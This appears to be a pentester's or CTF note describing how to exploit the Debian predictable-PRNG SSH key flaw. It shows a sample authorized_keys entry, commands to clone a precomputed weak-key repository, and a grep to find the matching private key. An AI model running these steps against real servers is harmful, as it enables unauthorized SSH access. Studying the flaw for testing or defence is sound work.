# SSH Key Predictable PRNG (Authorized\_Keys) Process

Obtain the authorized\_keys file. It will be something like (ssh-dss ....): ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNAi3IiFShIfx9bUcUNmyFDM7SaFrVBuuIW+2qnDF7vybPiMNI9/dQ7ck2gLUqPu2F4gfXml8W9RKcqTOVksRmQ5s0O4c88mCqV3F1nzKKMSZbK9yYWbafabX91f2SinBQZbfMGv8+R2TyE78LjAAAAFQDXtJ7Pca0RkEBFcBLfPzmCUBpSeQAAAIEAlK4NYlfGt3uInBaKG0kK/N0nZwX7ji++5xSiLLjI/0M9xacdWaZcPBZ4GretGGIhnYEPlBote8GlG1Ap7li39ATazIXJQguG+Mgun3de73RugX/oGsUt5oatCS2Lo9mfRBijlVYChLyQbgkZMwKziwR1BHUWE/jkCKT7bPEJvw8AAACBAJZHIWHJybvrIcs9oB5hTL/8r+C9gDx+R3vcEFQq58D/UDi5FWzA71IZfcOt2+EPabP77gB6Ad/nNy3BrqmkocwLX+Of1uwMhgD63UeE5fUOuIbW+z4OF1M9tuzFAGALDMHJSx8U8Z11lsiuO4Owx11pAo8Ebq0sKNDd0GzvVQxE root\@debian40server

&#x20;On the attacker machine, add the following line in /etc/ssh/ssh\_config: PubkeyAcceptedKeyTypes +ssh-dss&#x20;

Get the debian SSH repo: git clone <https://github.com/g0tmi1k/debian-ssh>

tar vjxf debian-ssh/common\_keys/debian\_ssh\_dsa\_1024\_x86.tar.bz2&#x20;

Copy the first 30 (approx.) characters after ssh-dss in the authorized\_keys, then search it in the repo using grep -lr:&#x20;

cd debian-ssh/common\_keys/dsa/1024/&#x20;

grep -lr 'AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNAi3IiFShIfx9'